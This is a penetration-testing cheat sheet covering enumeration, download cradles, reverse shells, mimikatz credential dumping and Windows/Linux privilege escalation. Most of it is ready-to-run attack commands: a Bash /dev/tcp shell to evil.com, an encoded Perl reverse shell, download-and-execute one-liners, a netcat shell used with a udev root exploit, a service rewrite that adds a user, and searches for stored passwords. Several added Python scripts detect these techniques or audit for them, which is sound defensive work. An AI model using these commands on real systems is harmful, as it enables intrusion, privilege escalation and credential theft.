This article is for educational purposes only; I am not responsible for any damage caused by wrongly applying this knowledge. It is what it is: security research. The article is not meant to be complete, but to create a scenario for security researchers. I have taken information from various resources, as you will see, and I have referenced them; if I have missed something, please excuse me.
0. Enumeration
netdiscover -r <network>/24
nmap -sV -T4 -O -F --version-light <ip>
nmap -sC -sS -T4 -A -v -v -Pn <ip>
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 <ip>
dirb http://<ip>
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://<ip>/FUZZ
smbclient -N -L <ip>
enum4linux -a <ip>
nikto -h <ip>
1. Download a file:
bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe
bitsadmin /transfer wcb /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://download.url c:\mess.exe&start mess.exe"
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
ftp 127.0.0.1 username password get file exit
cmd.exe /c "@echo open 192.168.1.3>script.txt&@echo binary>>script.txt&@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"
VB:
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' binary stream
    .open
    .write xHttp.responseBody
    .savetofile "C:%homepath%file", 2 ' 2 = overwrite an existing file
end with
cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs&@echo objXMLHTTP.open "GET","download.url/messbox.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"
PS:
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:%homepath%file")
powershell set-executionpolicy unrestricted
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"
PHP:
echo "<?php file_put_contents('28718.c', fopen('http://download.url/28718.c', 'r')); ?>" > down2.php
#!/usr/bin/php
<?php
$data = @file("http://example.com/file");   // one array element per line of the remote file
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, implode('', $data));              // write every line, not only the first one
fclose($fh);
?>
Perl:
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
Python:
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')
localFile.write(u.read())
localFile.close()
Ruby:
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}
Bash:
exec 5<>/dev/tcp/evil.com/8080
cat <&5 | while read line; do $line 2>&5 >&5; done
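The one-liners above share a few telltale command-line shapes, so a defender can look for them in process-creation telemetry (Windows event 4688 or Sysmon event 1 command lines). The following Python script is an added example, not code from the original article or from any of the referenced projects: it keeps a small rule table for the bitsadmin, scripted ftp, tftp, PowerShell WebClient and cscript/.vbs variants listed above and runs it over constructed sample command lines. The rule names, regexes, allowlist-free logic and sample lines are my own assumptions; the .vbs rule is tagged low-confidence on purpose, because script hosts are common in legitimate automation.

```python
import re

# Regexes for the download techniques listed above.  Rule names are my own;
# the last rule is low-confidence on its own and is tagged as such.
DOWNLOAD_RULES = [
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*?/transfer\b", re.I)),
    ("powershell_webclient", re.compile(r"Net\.WebClient|DownloadFile\(|DownloadString\(", re.I)),
    ("ftp_scripted", re.compile(r"\bftp(\.exe)?\b.*?\s-s:", re.I)),          # ftp -s:script.txt
    ("tftp_get", re.compile(r"\btftp(\.exe)?\b.*?\bget\b", re.I)),
    ("script_host_vbs_lowconf", re.compile(r"\b[cw]script(\.exe)?\b.*?\.vbs\b", re.I)),
]


def classify(cmdline):
    """Return the names of every download-cradle rule the command line matches."""
    return [name for name, rx in DOWNLOAD_RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, [rule names]) for each command line that hits at least one rule."""
    hits = []
    for cl in cmdlines:
        names = classify(cl)
        if names:
            hits.append((cl, names))
    return hits


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"bitsadmin /transfer wcb /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf",
    r'''cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"''',
    r"ftp -s:script.txt -v -A",
    r"cscript.exe poc.vbs",
    r"tftp -i 10.0.0.5 GET file.exe",
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"notepad.exe C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for cl, names in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(names), "<-", cl)
```

Run as-is it prints the five flagged lines with their rule names; the two benign lines are not reported. In production the rules would be applied to the `CommandLine` field of the event source rather than to a literal list.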
References:
http://stackoverflow.com/questions/4619088/windows-batch-file-file-download-from-a-url
https://codingsec.net/2016/06/download-file-using-command-line/
https://blog.netspi.com/15-ways-to-download-a-file/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
https://www.greyhathacker.net/?p=500
2. Get a limited shell:
h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>'
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
By default, it assumes a GET request and uses the inline shell mode.
To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.
For example:
h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
Perl:
http://<ip>:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
References:
https://n0where.net/common-reverse-shells/
https://github.com/infodox/web-exploitation-engine
http://insecurety.net/?tag=rce-py
https://web.archive.org/web/20160409012342/http://ptscripts.googlecode.com/svn/trunk/rce.py
https://www.exploit-db.com/papers/12871/
http://snipplr.com/view/72936/simple-php-backdoor-shell/
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html
http://www.c7ks.xyz/index.php/archives/18/
https://www.exploit-db.com/exploits/8921/
http://www.securityfocus.com/bid/55672/exploit
https://www.exploit-db.com/exploits/25136/
2.1 Direct Exploitation (Windows):
Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026):
https://www.exploit-db.com/exploits/100/
Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039):
https://www.exploit-db.com/exploits/103/
Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039):
https://www.exploit-db.com/exploits/109/
Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049):
https://www.exploit-db.com/exploits/119/
Microsoft Windows - ASN.1 Remote Exploit (MS04-007):
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz
Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011):
https://www.exploit-db.com/exploits/275/
Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011):
https://www.exploit-db.com/exploits/295/
Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031):
https://www.exploit-db.com/exploits/734/
Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3):
https://www.exploit-db.com/exploits/1075/
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039):
https://www.exploit-db.com/exploits/1149/
Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040):
https://www.exploit-db.com/exploits/2223/
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2):
https://www.exploit-db.com/exploits/2265/
Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070):
https://www.exploit-db.com/exploits/2789/
Microsoft Windows Server - Code Execution (MS08-067):
https://www.exploit-db.com/exploits/7104/
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067):
https://www.exploit-db.com/exploits/7132/
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050):
https://www.exploit-db.com/exploits/14674/
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054):
https://www.exploit-db.com/exploits/14607/
Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC):
https://www.exploit-db.com/exploits/12273/
2.2 Direct Exploitation (Linux):
Read (carefully) the Kioptrix series, there are very nice examples.
2.3 Directory traversals:
https://pentestlab.wordpress.com/2012/06/29/directory-traversal-cheat-sheet/
https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/
https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
https://blog.techorganic.com/2012/06/21/lets-kick-shell-ish-part-1-directory-traversal-made-easy/
3.1 Attempt hashdump (Windows)
Mimikatz Commands:
logonpasswords: mimikatz # sekurlsa::logonpasswords
Extracts passwords in memory
pth (pass the hash):
mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
A fake identity is created and the fake identity's NTLM hash is replaced with the real one.
“ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)”
“AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”
ptt (pass the ticket):
mimikatz # kerberos::ptt
Enables Kerberos ticket (TGT or TGS) injection into the current session.
tickets: mimikatz # sekurlsa::tickets /export
Identifies all session Kerberos tickets and lists/exports them.
sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
ekeys: mimikatz # sekurlsa::ekeys
Extracts the Kerberos encryption keys (ekeys) from memory. They allow the user account to be impersonated until its password is changed (which may be never for a smartcard/PKI user).
dpapi: mimikatz # sekurlsa::dpapi
minidump:
mimikatz # sekurlsa::minidump lsass.dmp
Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system).
kerberos:
mimikatz # sekurlsa::kerberos
Extracts the smartcard/PIV PIN from memory (cached in LSASS when using a smartcard).
debug:
mimikatz # privilege::debug
Sets debug mode for current mimikatz session enabling LSASS access.
lsadump cache: (requires token::elevate to be SYSTEM)
mimikatz # lsadump::cache
Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible as SYSTEM).
Download procdump
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Dump the lsass.exe process to lsass.dmp with procdump (downloaded above):
procdump -accepteula -ma lsass.exe lsass.dmp
Download mimikatz from https://github.com/thomhastings/mimikatz-en
Run mimikatz
Use debug mode
privilege::debug
Switch minidump
sekurlsa::minidump lsass.dmp
List all logon sessions; the passwords are now shown:
sekurlsa::logonPasswords
If you do not dump the memory, use this method instead:
Run mimikatz
Inject sekurlsa.dll into lsass.exe:
inject::process lsass.exe sekurlsa.dll
List all password:
@getLogonPasswords
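Both paths above (procdump writing lsass.dmp, or mimikatz reading LSASS directly) have to open a handle to lsass.exe with memory-read rights, and Sysmon Event ID 10 (ProcessAccess) records exactly that: SourceImage, TargetImage and the GrantedAccess mask. The following Python triage routine is an added example, not code from the original article, mimikatz or Sysmon: it decodes the dump-relevant bits of the mask with the winnt.h right values and alerts on any non-allowlisted process that opened LSASS with them. The allowlist and the sample events are constructed assumptions and would need tuning per environment.

```python
# Process access rights from winnt.h; any of these lets a caller read or
# tamper with LSASS memory, which is what a credential dump needs.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF
RIGHT_NAMES = {
    PROCESS_CREATE_THREAD: "CREATE_THREAD",
    PROCESS_VM_OPERATION: "VM_OPERATION",
    PROCESS_VM_READ: "VM_READ",
    PROCESS_VM_WRITE: "VM_WRITE",
}

# Assumed allowlist of OS components that legitimately open LSASS with broad
# rights (constructed for this example, not a vendor list; tune per host).
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}


def dump_capable_rights(mask):
    """Names of the dump-relevant rights present in a GrantedAccess mask."""
    if (mask & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        return ["ALL_ACCESS"]
    return [name for bit, name in RIGHT_NAMES.items() if mask & bit]


def triage(events):
    """Return one alert per ProcessAccess event in which a non-allowlisted
    process opened lsass.exe with rights sufficient to dump it."""
    alerts = []
    for ev in events:
        if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        if ev["SourceImage"].lower() in ALLOWLISTED_SOURCES:
            continue
        mask = int(ev["GrantedAccess"], 16)
        rights = dump_capable_rights(mask)
        if rights:
            alerts.append({"source": ev["SourceImage"],
                           "granted": ev["GrantedAccess"],
                           "rights": rights})
    return alerts


# Constructed Sysmon Event ID 10 records reduced to the three fields the
# logic needs; not real telemetry.  0x1FFFFF is PROCESS_ALL_ACCESS (what a
# full minidump asks for), 0x1010 is QUERY_LIMITED_INFORMATION | VM_READ,
# 0x1000 alone carries no read right.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\system32\csrss.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["source"], alert["granted"], ",".join(alert["rights"]))
```

Only the first two sample events produce alerts: the allowlisted csrss.exe is skipped, the 0x1000 handle has no read right, and the last event does not target LSASS at all. Matching on the rights bits rather than on exact mask values keeps the rule from being bypassed by a tool that requests an unusual combination.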
References:
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/
https://sathisharthars.wordpress.com/2014/07/09/dump-cleartext-password-with-mimikatz-using-metasploit/
https://adsecurity.org/?p=556
http://www.darkoperator.com/blog/2013/6/11/stealing-user-certificates-with-meterpreter-mimikatz-extensi.html
http://hardsec.net/mimikatz-meterpreter-extension/?lang=en
http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html
http://www.r00tsec.com/2013/06/howto-dump-password-from-lsassexe.html
Try 1:
https://github.com/shjalayeri/sysret
Tasklist
sysret -pid <explorer pid>
Try 2:
Process Injector:
http://www.tarasco.org/security/Process_Injector/
Try 3:
KiTrap0D
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip
Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ):
https://www.exploit-db.com/exploits/25912/
Try 4:
NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC - Nikita Tarakanov, 2011-03-01 (Exploit-DB 16262, platforms/windows/dos)
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
Service Tracing Key (MS10-059)
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554
Ryujin - ADF.sys priv esc - ms11-080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/
UAC Bypass priv esc
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info
Try 5:
c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt *.xml *.ini
findstr /si pass *.txt *.xml *.ini
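The base64 value in an unattend.xml Password element is the UTF-16LE encoding of the password with the element name appended ("Password", or "AdministratorPassword" for that element), which is why the `base64 -d` output above looks like characters separated by NULs. The following Python audit script is an added example, not code from the original article or from Microsoft: it walks an unattend/sysprep XML file, finds every Password/AdministratorPassword element with a Value child, decodes it (honouring the PlainText flag; a missing flag is assumed to mean base64) and reports the account it belongs to, so leftover deployment files can be found and cleaned up and the affected passwords rotated. The sample XML is constructed; it reuses the encoded value shown above.

```python
import base64
import xml.etree.ElementTree as ET

# Elements whose Value is base64(UTF-16LE(password + element name)) unless PlainText is true.
SUFFIXED_ELEMENTS = ("Password", "AdministratorPassword")


def local_name(tag):
    """Strip the XML namespace from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def decode_value(value, element_name, plaintext):
    """Recover the cleartext password from an unattend <Value>."""
    if plaintext:
        return value
    text = base64.b64decode(value).decode("utf-16-le")
    if text.endswith(element_name):          # Windows appends the element name
        text = text[:-len(element_name)]
    return text


def find_credentials(xml_text):
    """Return one finding per password element: which element, which account,
    whether it was stored in the clear, and the recovered password."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        name = local_name(elem.tag)
        if name not in SUFFIXED_ELEMENTS:
            continue
        value, plaintext = None, False       # assumption: missing PlainText means base64
        for child in elem:
            cn = local_name(child.tag)
            if cn == "Value":
                value = (child.text or "").strip()
            elif cn == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if not value:
            continue
        account = None
        parent = parents.get(elem)
        if parent is not None:
            for sib in parent:               # AutoLogon uses Username, LocalAccount uses Name
                if local_name(sib.tag) in ("Username", "Name"):
                    account = (sib.text or "").strip()
        findings.append({"element": name, "account": account,
                         "plaintext": plaintext,
                         "password": decode_value(value, name, plaintext)})
    return findings


# Constructed sample unattend.xml; the AutoLogon value is the one decoded above.
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>Winter2024!</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for f in find_credentials(SAMPLE_UNATTEND):
        print(f["element"], f["account"], "plaintext" if f["plaintext"] else "base64", f["password"])
```

Pointed at a real file (`find_credentials(open(path, encoding="utf-8").read())`) it lists every embedded credential; any hit means the file should be removed from the image and the account's password changed, since every other machine built from the same answer file shares it.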
Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]
Change the upnp service binary
http://lanmaster53.com
sc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password= ""
net stop upnphost
net start upnphost
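The reconfiguration above leaves a service whose BINARY_PATH_NAME is not an executable image at all and which runs as LocalSystem, and `sc qc <service>` shows both fields. The following Python script is an added example, not code from the original article or from lanmaster53: it parses the text of one or more `sc qc` calls and flags services whose binary is not a .exe path, lies outside the Windows and Program Files trees, or is an unquoted path containing spaces (the "services pointing to writeable locations" class listed further down), escalating any finding when the service runs as LocalSystem. The trusted-directory list is a coarse assumption for triage, and the three service blocks are constructed sample output in the real `sc qc` layout.

```python
import re

# One "KEY : value" line of sc qc output; DEPENDENCIES continuation lines
# (which start with ":") and the "[SC] ..." banner do not match.
FIELD_RX = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")

# Assumed trusted roots; a writable subfolder under these would still pass
# this coarse check, so treat it as triage, not proof.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_sc_qc(text):
    """Parse the output of one or more `sc qc <name>` calls into {service: {field: value}}."""
    services, current = {}, None
    for line in text.splitlines():
        m = FIELD_RX.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "SERVICE_NAME":
            current = services.setdefault(value, {})
        elif current is not None:
            current[key] = value
    return services


def executable_of(binpath):
    """Return (image path, was_quoted) from a BINARY_PATH_NAME value."""
    if binpath.startswith('"'):
        end = binpath.find('"', 1)
        return (binpath[1:end] if end > 0 else binpath[1:]), True
    idx = binpath.lower().find(".exe")
    if idx >= 0:
        return binpath[: idx + 4], False
    return binpath.split(" ", 1)[0], False


def audit_service(fields):
    """List the weaknesses visible in one service's configuration."""
    findings = []
    exe, quoted = executable_of(fields.get("BINARY_PATH_NAME", ""))
    low = exe.lower()
    if not low.endswith(".exe"):
        findings.append("binary path is not an executable image")
    if not low.startswith(TRUSTED_PREFIXES):
        findings.append("binary outside trusted directories")
    if not quoted and " " in exe:
        findings.append("unquoted service path containing spaces")
    account = fields.get("SERVICE_START_NAME", "").lower()
    if findings and account in ("localsystem", ".\\localsystem", "nt authority\\system"):
        findings.append("runs as LocalSystem")
    return findings


def audit(text):
    """Map every service in the sc qc text to its findings (empty list = clean)."""
    return {name: audit_service(f) for name, f in parse_sc_qc(text).items()}


# Constructed sample output of three `sc qc` calls (not from a real host).
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : UPnP Device Host
        DEPENDENCIES       : ssdpsrv
                           : httpservice
        SERVICE_START_NAME : NT AUTHORITY\LocalService

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BackupSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : net user backdoor /add
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BackupSvc
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AcmeAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Acme Agent\agent.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Acme Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_SC_QC).items():
        print(name, "->", "; ".join(findings) or "clean")
```

On a live host the text would come from `sc qc` run per service name (for example over the list from `sc query type= service state= all`); the clean svchost-hosted upnphost gets no findings, the tampered service is flagged on all three counts, and the unquoted Program Files path is reported as the classic writable-path candidate.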
------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027
Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?
sysinternals tools
accesschk.exe -uwcqv *
*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
------------------------------------------------------------------------------------------------------
References:
http://it-ovid.blogspot.bg/2012/02/windows-privilege-escalation.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
https://www.nightlionsecurity.com/blog/guides/2012/11/windows-7-privilege-escelation-uac-bypass-guide-with-sysret-exploit/
https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
http://www.top-password.com/blog/reset-windows-10-password-with-sticky-keys/
http://toshellandback.com/2015/11/24/ms-priv-esc/
find / -user root -perm -4000 -ls 2>/dev/null
Read this carefully:
http://www.doomedraven.com/2013/04/hacking-linux-part-i-privilege.html
Exploit for distcc to escalate the privilege from user daemon to root.
wget --no-check-certificate http://www.exploit-db.com/download/8572 -O exploit-8572.c
ls -l exploit-8572.c
gcc exploit-8572.c -o exploit-8572
ls -l exploit-8572*
echo '#!/bin/sh' > /tmp/run
echo '/bin/netcat -e /bin/sh <our ip> 4444' >> /tmp/run
ps -eaf | grep udev | grep -v grep
[1] Record the udevd PID (e.g. 2709), [2] subtract 1 from it (2708), and [3] supply the resulting PID to the next step:
./exploit-8572 2708
Other exploits:
http://clshack.com/index.html%3Fp=3442.html
https://git.zx2c4.com/CVE-2012-0056/about/
https://git.zx2c4.com/CVE-2012-0056/tree/
References:
https://www.pentestpartners.com/blog/exploiting-suid-executables/
https://blog.sucuri.net/2013/05/from-a-site-compromise-to-full-root-access-symlinks-to-root-part-i.html